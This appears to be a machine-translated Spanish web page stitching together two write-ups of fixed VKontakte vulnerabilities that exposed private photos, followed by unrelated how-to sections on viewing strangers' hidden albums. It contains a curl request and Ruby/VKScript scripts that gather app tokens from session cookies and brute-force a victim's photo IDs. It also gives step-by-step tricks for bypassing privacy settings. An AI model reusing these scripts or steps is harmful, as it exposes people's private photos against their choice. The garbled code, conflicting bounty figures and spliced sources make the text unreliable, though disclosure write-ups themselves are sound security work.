10 de febrero de 2016 a las 15:23

Vulnerabilidad de VKontakte: acceso a vistas previas de fotos desde diálogos y álbumes ocultos de cualquier usuario

Corto

Se descubrió una vulnerabilidad en la versión móvil del sitio web vk.com. Le permitía ver vistas previas de fotos ocultas, incluidas fotos de conversaciones de usuarios, y además podía obtener información sobre los usuarios a quienes les gustó esta foto oculta. Por el momento, la vulnerabilidad ya no existe; se solucionó hace seis meses. VKontakte expresó su agradecimiento por la cantidad de 700 dólares (no, no en votos).

Cómo todo empezó

Durante la sesión te distraes de todo, pero no de prepararte para los exámenes. Entonces, cuando vi sobre el programa Bug Bounty de VKontakte en hackerone.com, en lugar de prepararme para los exámenes, comencé a buscar vulnerabilidades. Por alguna razón, inmediatamente me sentí atraído a buscar vulnerabilidades asociadas con fotografías y configuraciones de privacidad ocultas, y resultó que no fue en vano.

Busque vulnerabilidades en la versión completa del sitio.

Suponiendo que conocía la identificación de la foto oculta (más información sobre cómo encontrarla a continuación), comencé a intentar sustituir esta identificación en todo tipo de solicitudes de curl: intenté guardar imágenes ocultas en mi álbum, etiquetarme en ellas, dar me gusta, volver a publicar, etc. nada dio un resultado positivo hasta que intenté simplemente enviar una foto oculta a mi muro. El resultado fue extraño: en la consola la solicitud arrojó el resultado correcto y apareció una nueva publicación en el muro, pero no importa cuánto lo intenté. , todo se detuvo en el servidor, intentos de enviar una foto oculta al muro: las publicaciones estaban vacías.

Cambiar a la versión móvil

Entonces recordé este comentario y decidí intentar hacer lo mismo en la versión móvil del sitio.

Enviando una foto al muro:

Curl "http://m.vk.com/wall53083705" -H "Cookie: remixsid=#remixsid" --data "act=post&hash=#hash&attach1_type=photo&attach1=idOwnerPhoto_idHiddenPhoto" # la identificación de la foto consta de dos partes separadas por un guión bajo idOwnerPhoto_idHiddenPhoto
Esta solicitud no se completó correctamente, pero después de actualizar la página, me sorprendió descubrir que en el formulario de envío aparecía una pequeña copia adjunta de la foto.

El tamaño máximo de la foto es 130x130, pero esto es suficiente para, por ejemplo, reconocer caras en una foto. Los intentos de obtener un enlace a la foto completa no tuvieron éxito. Aparentemente, una vez cerrada esta vulnerabilidad, no se pueden obtener fácilmente enlaces directos en tamaño completo desde la versión móvil del sitio.

Navegando fotos

Vulnerabilidad encontrada. Para explotar la vulnerabilidad encontrada, es necesario obtener la identificación de la foto atacada.

La identificación con foto consta de dos partes: photo12345_330000000 (Owner_idPhoto), la segunda parte crece de una foto a otra, pero este no es un incremento automático normal. Como se desconoce el algoritmo de selección de pasos, iteraremos con el paso 1.

Para enumerar usaremos el método api fotos.eliminar. Para todas las fotos existentes (incluidas las ocultas), este método devolverá código de error: 15. Y para todas las identificaciones con fotografía que no existan, se devolverá una.

Velocidad de búsqueda

En este artículo podrás aprender cómo ordenar rápidamente las fotografías. Sí, los datos que contiene no son los más recientes, pero incluso si se tiene en cuenta que el número de fotografías se ha duplicado durante el año, el tiempo de búsqueda sigue siendo aceptable.

Para encontrar enlaces directos a las fotos de un usuario, digamos, del año pasado, solo necesita clasificar 30 millones (de _320000000 a _350000000) de diferentes variaciones de enlaces.

Utilizando las aceleraciones de búsqueda del artículo mencionado, se pueden buscar las fotos del usuario:

en 1 minuto obtén todas tus fotos de ayer, en 7 minutos - todas las fotos cargadas la semana pasada, en 20 minutos - el mes pasado, en 2 horas - el año pasado.

Eliminación de abierto/oculto

Habiendo recibido enlaces a todas las fotos (tanto ocultas como abiertas) del usuario, puede seleccionar solo las ocultas intentando obtener información sobre la foto utilizando el método photos.getById. Aquellas fotografías cuya información no se devuelve mediante este método quedan ocultas.

Información sobre los usuarios que me gustan

También fue posible reconocer a los usuarios a quienes les gustó la foto oculta. El método likes.getList devolvió todos los usuarios que agregaron un objeto determinado a su lista de Me gusta, incluso si ese objeto estaba oculto para el usuario que ejecuta este método.

Informar a hackerone

Mi informe se abrió en junio. Cerraron la vulnerabilidad después de dos meses y medio sin decirme nada. Otro mes después recibí una respuesta de que la vulnerabilidad había sido confirmada y cerrada. Y después de un tiempo recibí una recompensa.

P.D.: para aquellos que intentan retirar recompensas de hackerone.com a una nueva cuenta de PayPal por primera vez, les aconsejo que lean atentamente los términos y condiciones. Paypal, al transferir fondos, puede, sin su consentimiento, convertir la recompensa a la moneda del país especificado en su perfil.

Algunos usuarios niegan el acceso a sus grabaciones, álbumes, fotografías, grabaciones de audio y vídeo. Para ver fotos ocultas en una página VK, necesita conocer su ID.

Para realizar cualquier acción de VK, incluida la búsqueda de una identificación, inicie sesión con su nombre de usuario o número de teléfono y contraseña.

Para ver fotos privadas, copie la identificación de usuario de la barra de direcciones de su navegador. Para hacer esto, abra la página deseada y verá los números después de la palabra "id":

Hay situaciones en las que se muestra el apodo del usuario en lugar de su identificación. En este caso, para averiguar la identificación, debe hacer clic en cualquier publicación en el muro y abrir la dirección del enlace en el navegador. El identificador se puede ver entre el texto “muro” y el guión bajo.

Si no hay publicaciones en el muro, puede abrir el avatar de la persona y en el navegador buscar el identificador después de la palabra "foto".

Hay situaciones en las que el usuario tiene un acceso completamente limitado a sus datos, de tal manera que es imposible incluso ampliar y ver el avatar. Además, en lugar de una identificación, también hay un apodo en su página. En este caso, deberá recurrir al código HTML. Para hacer esto, haga clic derecho y seleccione la pestaña "Ver código de página"

Copie el nombre de usuario, inicie la búsqueda usando la combinación de teclas “Ctrl+F” y pegue los datos en el campo correspondiente. Haga clic en Aceptar. El navegador mostrará 1 y 2 coincidencias. Si la primera coincidencia no tiene una identificación especificada, pase a la segunda.

Cómo ver las fotos de un usuario conociendo el id

Conociendo el identificador se pueden visualizar fotografías privadas, incluidas aquellas en las que la persona ha sido etiquetada por otros usuarios. Para hacer esto necesitas hacer lo siguiente:

1. En la barra de direcciones de su navegador, ingrese el siguiente texto:

Una enorme colección de fotografías privadas en VK (alrededor de 100 millones). El servicio recopila fotografías de todos los usuarios de las redes sociales. redes en un único directorio.

Encontrar fotografías de un usuario en particular es fácil: simplemente ingrésela. Pero es difícil de eliminar, si escribes a los creadores por correo electrónico, las posibilidades son bajas, pero si haces donaciones, las posibilidades aumentan.

¿Cómo recopila fotografías el depósito de ganado en VK? Es muy simple: el servicio carga automáticamente en la colección fotos de todos los usuarios en línea. No importa dónde publiques tu foto, en una comunidad o perfil. Aunque la foto se borre al cabo de un par de minutos, ya estará en el puesto de ganado.

Por lo tanto, muchos usuarios insatisfechos recurrieron a Roskomnadzor, lo que contribuyó a la estación ganadera fue bloqueada en el territorio de la Federación de Rusia. No es posible evitar el bloqueo.

Está prohibida la recogida y almacenamiento de datos personales de los usuarios. Aunque los propios usuarios publican fotos públicamente.

Por ahora el sitio no funciona incluso desde servidores proxy. Los propietarios abandonaron el negocio inmediatamente después del bloqueo. Para que puedas dormir tranquilo y no tengas miedo de que alguien mire tus fotos personales.

Analogos de Skotobaza

En 2018 Había diferentes análogos, como "Burn", pero no todos funcionan, ya que los desarrolladores de VKontakte modificaron scripts que prohíben a los bots robar fotos privadas.

Atención: Internet está lleno de "análogos" de una explotación ganadera, pero no sólo no funcionan, sino que también provocan piratería de cuentas! Si se encuentra con dichos sitios, bajo ninguna circunstancia no ingrese datos de VKontakte. Los atacantes obtendrán acceso a la cuenta y podrán hacerlo.

Se acabó la era de las explotaciones ganaderas y servicios similares. Ahora está prohibido el almacenamiento y distribución de fotografías íntimas y privadas. Si no sigues la ley, seguirá el castigo.

tl; dr

Se descubrió una vulnerabilidad en los marcadores VK, que permitía recibir enlaces directos a fotos privadas desde mensajes personales y álbumes de cualquier usuario/grupo. Se escribió un script que clasificaba las fotos de los usuarios durante un período determinado y luego, a través de esta vulnerabilidad, recibía enlaces directos a las imágenes. En resumen, podrías obtener todas tus fotos de ayer en 1 minuto, todas las fotos subidas la semana pasada en 7 minutos, el mes pasado en 20 minutos, el año pasado en 2 horas. La vulnerabilidad ya ha sido solucionada. La administración de VKontakte pagó una recompensa de 10.000 votos.

La historia comenzó cuando me enviaron una imagen en un mensaje personal en VKontakte. Normalmente, si algo es importante, lo subo a la nube, pero en mi caso esto no fue necesario y decidí utilizar la función de marcadores de VKontakte.

Brevemente sobre esta funcionalidad: todo lo que le gustó al usuario se agrega a los marcadores; También hay una función para agregar manualmente un enlace a un usuario y un enlace interno de VKontakte. El último punto me pareció muy interesante, porque luego de agregar un enlace a la foto, vi su vista previa y el texto con el tipo de entidad agregada:

Cuando se agrega un enlace, el servidor lo analiza, intenta averiguar a qué entidad se refiere y recupera información sobre este objeto de la base de datos. Normalmente, cuando se escribe este tipo de función con muchas condiciones, la probabilidad de que el desarrollador olvide algo es muy alta. Así que no podía permitirme el lujo de dejarlo pasar y decidí tomarme unos minutos para experimentar un poco.

Como resultado, logré encontrar algo. Al agregar un enlace a una foto, nota o video al que no se puede acceder, podrías obtener un poco de información privada sobre el objeto. En el caso de fotos y vídeos, se trata de una pequeña vista previa (150x150), en la que es bastante difícil ver algo, se muestra el título de las notas privadas; A través del método API fave.getEnlaces Fue posible obtener enlaces a la imagen, pero nuevamente el tamaño era demasiado pequeño (75 px y 130 px). Así que, en esencia, nada grave.

Decidí ir a la versión móvil del sitio para comprobar si todo se mostraba igual que en la versión normal. Mirando el código de la página, vi esto:

¡Sí! En el valor del atributo datos-src_big¡Había un enlace directo a la imagen original!

Por lo tanto, era posible obtener un enlace directo a cualquier imagen en VKontakte, independientemente de dónde se cargó y qué configuración de privacidad tenía. Podría ser una imagen de mensajes personales o una foto de los álbumes privados de cualquier usuario/grupo.

Parecería que podría detenerme ahí y escribir a los desarrolladores, pero me preguntaba si era posible, explotando esta vulnerabilidad, obtener acceso a todas las fotos (o descargadas en un cierto período de tiempo) del usuario. El principal problema aquí, como comprenderá, fue que no siempre se conoce el enlace a una foto privada del formulario. fotoXXXXXX_XXXXXXX para agregar a tus favoritos. Me vino a la mente la idea de buscar la identificación de la foto, pero por alguna razón inmediatamente lo rechacé por considerarlo una locura. Revisé los métodos relacionados con las fotografías en la API, miré cómo funciona la aplicación con los álbumes, pero no pude encontrar ninguna filtración que pudiera ayudarme a obtener una lista con los ID de todas las fotografías privadas del usuario. Estuve a punto de renunciar a esta idea, pero mirando de nuevo el enlace con la foto, de repente me di cuenta de que exagerar era una buena idea.

Cómo funcionan las fotos en VK

¿Cómo podrías reemplazar? Enlace a la foto. foto52708106_359542386 consta de dos partes: (ID de usuario)_(algún número extraño). ¿Cómo se forma la segunda parte?

Por desgracia, después de pasar dos horas experimentando, todavía no entendía esto. En 2012, en HighLoad++, Oleg Illarionov dijo algunas palabras sobre cómo almacenan fotos, sobre la fragmentación horizontal y la selección aleatoria de un servidor para cargar, pero esta información no me dio nada, ya que no hay conexión entre la identificación del servidor y el identificación fotográfica. Está claro que existe una especie de contador global, pero hay otra lógica... Porque si el segundo número se formara mediante el incremento automático normal, entonces los valores de las identificaciones con fotografía habrían alcanzado hace mucho tiempo valores enormes. (para Facebook, por ejemplo, en este momento es ~ 700 billones), pero para Vkontakte este valor es solo ~ 400 millones (aunque, a juzgar por las estadísticas, a diario los usuarios suben más de 30 millones de fotos). Aquellos. Está claro que esta cifra no es única, pero al mismo tiempo no es aleatoria. Escribí un guión que revisó las fotografías de usuarios "antiguos" y, a partir de los datos recibidos, hice una gráfica de cuánto cambiaba esta cifra con cada uno. año:

Se puede observar que los valores fluctúan dependiendo de algunos factores (¿número de servidores o nueva lógica?). Pero la cuestión es que son bastante pequeños (especialmente en los últimos 2 o 3 años) y es muy fácil calcular el rango de identificación para el período de tiempo deseado. Es decir, para encontrar enlaces directos a las fotos de un usuario, digamos, del año pasado, ¡debe intentar marcar solo 30 millones (de _320000000 a _350000000) variaciones diferentes de enlaces! A continuación describí una técnica de fuerza bruta que me permitió hacer esto en cuestión de minutos.

Pasando por las fotos

Podrías agregar todo esto manualmente a través de la interfaz o escribir un script que agregue un enlace a los marcadores, pero eso sería aburrido y llevaría mucho tiempo. La velocidad de búsqueda en este caso sería de 3 marcadores por segundo, porque enviar más de tres solicitudes por segundo al servidor de Vkontakte esta prohibido.

Acelera la búsqueda x25

Para sortear al menos un poco el límite de 3 solicitudes, decidí utilizar el método ejecutar. En una llamada a este método, son posibles 25 llamadas a métodos API.

Var inicio = parseInt(Args.start); var fin = parseInt(Args.end); var victimId = Args.id; enlace var = "http://vk.com/photo" + victimId + "_"; while(inicio!= fin) ( API.fave.addLink(( "enlace": enlace + inicio )); inicio = inicio + 1; );
Así, logramos aumentar la velocidad de la fuerza bruta a 3*25 marcadores/seg. Durante el año pasado, habría llevado mucho tiempo clasificar las fotografías, pero durante períodos cortos este método de clasificación ya era bastante bueno.

Aceleramos la búsqueda x25 * número de solicitudes paralelas por segundo

El límite en el número de solicitudes/segundo se aplica a cada aplicación por separado y no a todo el usuario. Entonces, nada le impide enviar muchas solicitudes en paralelo, pero al mismo tiempo utilizar tokens de diferentes aplicaciones.

Primero necesitábamos encontrar (o crear) la cantidad requerida de aplicaciones. Se escribió un script que busca aplicaciones independientes en un rango determinado de identificadores de aplicaciones:

Clase StandaloneAppsFinder attr_reader:app_ids def inicializar(params) @range = params[:in_range] @app_ids = finalizar def búsqueda (@range).cada uno |app_id| respuesta = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
También era posible seleccionar aplicaciones por número de usuarios para acelerar aún más la búsqueda:

Pero decidí no molestarme con eso.

Ok, se han encontrado las aplicaciones, ahora necesitan dar permiso a los datos de nuestro usuario y recibir tokens. Para la autorización tuvimos que utilizar el mecanismo de Flujo Implícito. Tuve que analizar la URL de autorización del cuadro de diálogo de OAuth y extraer el token después de la redirección. Esta clase requiere cookies para funcionar. p,l(login.vk.com) y remezclado(vk.com):

Autenticador de clase attr_reader:access_tokens def inicializar(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def Authorize_apps(apps) apps.each do |app_id| auth_url = extraer_auth_url_from(oauth_page(app_id)) redirección_url = abrir(auth_url, @cookies).base_uri.to_s access_tokens<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
El número de solicitudes encontradas es igual al número de solicitudes paralelas. Para paralelizar todo esto, se decidió utilizar la gema Typhoeus, que ha demostrado su eficacia en otras tareas. El resultado es una pequeña fuerza bruta como esta:

Fotos de claseBruteforcer PHOTOS_ID_BY_PERIOD = ( "hoy" => 366300000..366500000, "ayer" => 366050000..366300000, "mes_actual" => 365000000..366500000, "último_mes" => 3600000 00..365000000, "año_actual" = > 350000000..366500000, "last_year" => 320000000..350000000 ) def inicializar(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(tokens) hidra = Typhoeus::Hydra.new tokensIterator = 0 (@period).paso(25) hacer |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1? 0: tokensIterator + 1 hidra.queue Typhoeus::Request.new codificado_url hidra.run si tokensIterator.zero? finalizar Hydra.run a menos que Hydra.queued_requests.count.zero? finalizar la definición privada de vkscript (photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Para acelerar aún más la fuerza bruta, hubo un intento de deshacerse del cuerpo innecesario en la respuesta, pero CABEZA La solicitud del servidor VKontakte devuelve un error 501 No implementado.

La versión final del script se ve así:

Requiere "nokogiri" requiere "open-uri" requiere "typhoeus" requiere "json" requiere "./standalone_apps_finder" requiere "./photos_bruteforcer" requiere "./authenticator" bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, punto: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookies de login.vk.com # remixsid - cookie de vk.com authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
Después de ejecutar el programa, los marcadores contenían todas las fotos del usuario durante un período determinado. Todo lo que quedaba era ir a la versión móvil de VKontakte, abrir la consola del navegador, abrir enlaces directos y disfrutar de las fotos en su tamaño original.

Resultados

En general, todo depende de su conexión a Internet y de la velocidad de los servidores proxy, la latencia de los servidores de Vkontakte, la potencia del procesador y muchos otros factores. Después de probar el script anterior en mi cuenta, obtuve los siguientes números (sin tener en cuenta el tiempo dedicado a recibir tokens):

La tabla muestra el tiempo promedio requerido para probar identificaciones con fotografía durante un período determinado. Estoy seguro de que todo esto podría haberse acelerado entre 10 y 20 veces. Por ejemplo, en un script de fuerza bruta, cree una cola grande de todas las solicitudes y sincronización normal entre ellas, porque En mi implementación, una solicitud con un tiempo de espera ralentizará todo el proceso. Y, en general, podrías comprar un par de instancias en EC2 y obtener todas las fotos de cualquier usuario en una hora. Pero ya quería dormir.

Y, en general, no importa cuánto tiempo dedique el atacante a esto, 5 horas o todo el día, porque de una forma u otra obtendrá enlaces a imágenes privadas. La capacidad de obtener acceso seguro a información privada en un período de tiempo finito es la principal amenaza que plantea esta vulnerabilidad.

Informar una vulnerabilidad

Al principio, el informe se envió al servicio de soporte, pero después de una respuesta como "gracias, probablemente lo solucionaremos de alguna manera..." y una semana de espera, me sentí un poco triste. Muchas gracias a Bo0oM, quien ayudó a contactar directamente a los desarrolladores. Después de eso, los errores se solucionaron en unas pocas horas y unos días después la administración transfirió una recompensa de 10k a mi cuenta.

En el proceso de explorar las posibilidades y simplemente utilizar las páginas de la moderna red social VKontakte, los usuarios surgen una gran cantidad de preguntas. Uno de los más comunes es la solución al problema de cómo ver fotos ocultas en VKontakte. Muy a menudo, los usuarios ocultan total o parcialmente sus perfiles, por lo que no es posible ver sus fotos.

Antes de considerar la cuestión de la posibilidad de ver fotografías ocultas, vale la pena considerar brevemente el tema de ocultarlas. Para ocultar sus fotos, deberá seguir estos pasos:

• Debes ir a la página de VK;
• A la izquierda, busca la línea “Mi configuración” y actívala;
• Abra la subsección "Privacidad";
• Aparecerán configuraciones de privacidad especiales. Se pueden instalar a su discreción.

Puedes ocultar no sólo fotos, sino también grabaciones de audio, publicaciones y amigos. Al seleccionar la línea que refleja quién puede ver la foto, debe determinar quién podrá ver fotos personales. Aquí puede elegir privacidad total configurándola en "solo yo" o permitiendo la visualización solo para amigos. Las funciones instaladas comienzan a funcionar inmediatamente después de realizar los ajustes.

¿Cómo ver las fotos guardadas en VK si están ocultas?

Entonces, ¿cómo ver fotos ocultas de usuarios de VK? No existe un esquema de acción oficial aquí, ya que los desarrolladores de la red social respetan el deseo de los usuarios de mantener su privacidad. Si desea ver fotos VK ocultas, debe seguir estos pasos:

1. Debes ir al perfil del usuario cuya foto quieres ver.
2. Haga clic en un espacio vacío con un botón normal del mouse.
3. Seleccione la sección "Ver código fuente de la página".
4. Presione Ctrl+F.
5. En la búsqueda introduce “álbumes”, solo que sin comillas.
6. Los números aparecen en la línea después de esta palabra; es necesario copiarlos. Este es el código de la página.
7. Debes ir nuevamente al perfil del usuario e ingresar “?z=álbums” en la barra de direcciones después del ID, también sin comillas.
8. Se pega el fragmento previamente copiado.
9. Presiona Enter y disfruta viendo fotos ocultas.

¡Importante! Esta opción de ver fotografías privadas si el acceso está cerrado no es del todo legal; la administración de VK no la aprueba.

Por este motivo, no debería sorprenderte que se cierre la posibilidad de ver las fotos guardadas si están ocultas.

Sitio web para ver fotos ocultas en VKontakte

Este método se puede utilizar en el caso de un fragmento de código ya recibido, que se puede obtener mediante el método descrito anteriormente. Para ver fotos ocultas, debe regresar a la página deseada, en el sitio de la red social, en la barra de búsqueda del navegador, ingrese un enlace organizado por tipo: vk.com/id...., donde después del ID hay una página número de identificación. A continuación, coloque el cursor al final de la dirección e inmediatamente ingrese los caracteres especiales "?z=".

Como resultado de tales acciones, aparecerá el siguiente mensaje en la línea del navegador en funcionamiento: vk.com/id......?z=albums....., donde los puntos suspensivos son el ID del usuario. Después de presionar Enter, todas las fotos de la persona de interés se abrirán automáticamente para su atención.

Conclusión

Con los métodos bastante simples que se le han presentado, podrá estudiar fotografías de usuarios en álbumes cerrados sin ningún problema. La principal ventaja de estas técnicas es la posibilidad de ver fotografías en los álbumes de aquellas personas que ya no son amigos en VK y completos desconocidos.